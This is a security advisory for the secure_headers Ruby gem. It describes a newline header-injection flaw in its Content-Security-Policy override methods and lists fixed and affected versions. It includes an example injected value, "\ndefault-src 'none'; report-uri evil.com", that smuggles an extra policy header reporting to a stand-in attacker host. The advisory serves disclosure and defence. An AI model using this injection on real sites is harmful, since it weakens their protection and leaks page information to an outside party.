GHSA-w978-rmpf-qmwg

Source
https://github.com/advisories/GHSA-w978-rmpf-qmwg
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/01/GHSA-w978-rmpf-qmwg/GHSA-w978-rmpf-qmwg.json
Aliases
Published
2020-01-23T02:27:53Z
Modified
2023-11-08T04:03:51.432736Z
Details

Impact

If user-supplied input was passed into append/overridecontentsecuritypolicydirectives, a newline could be injected leading to limited header injection.

Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy header with the remaining value of the original string. It will continue to create new headers for each newline.

e.g.

override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"])` 

would result in

Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: injected
Content-Security-Policy: rest-of-the-header

CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial:

override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) 
Content-Security-Policy: ... script-src: mycdn.com
Content-Security-Policy: default-src 'none'; report-uri evil.com
Content-Security-Policy: rest-of-the-header

Patches

This has been fixed in 6.3.0, 5.2.0, and 3.9.0

Workarounds

override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")])

References

https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c The effect of multiple policies

For more information

If you have any questions or comments about this advisory: * Open an issue in this repo * DM us at @ndm on twitter

References

Affected packages

RubyGems / secure_headers

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
6.0.0
Fixed
6.3.0

Affected versions

6.*

6.0.0
6.1.0
6.1.1
6.1.2
6.2.0

RubyGems / secure_headers

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
5.0.0
Fixed
5.2.0

Affected versions

5.*

5.0.1
5.0.2
5.0.3
5.0.4
5.0.5
5.1.0

RubyGems / secure_headers

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0The exact introduced commit is unknown
Fixed
3.9.0

Affected versions

0.*

0.1.0
0.1.1
0.2.0
0.2.1
0.3.0
0.4.0
0.4.1
0.4.2
0.4.3
0.5.0

1.*

1.0.0
1.1.0
1.1.1
1.2.0
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.4.0
1.4.1

2.*

2.0.0.pre
2.0.0.pre2
2.0.0
2.0.1
2.0.2
2.1.0
2.2.0
2.2.1
2.2.2
2.2.3
2.2.4
2.3.0
2.4.0
2.4.1
2.4.2
2.4.3
2.4.4
2.5.0
2.5.1
2.5.2
2.5.3

3.*

3.0.0.pre
3.0.0.pre1
3.0.0.pre2
3.0.0.pre3
3.0.0.rc1
3.0.0
3.0.1
3.0.2
3.0.3
3.1.0
3.1.1
3.1.2
3.2.0
3.3.0
3.3.1
3.3.2
3.4.0
3.4.1
3.5.0.pre
3.5.0
3.5.1
3.6.0
3.6.1
3.6.2
3.6.3
3.6.4
3.6.5
3.6.6
3.6.7
3.7.0
3.7.1
3.7.2
3.7.3
3.7.4
3.8.0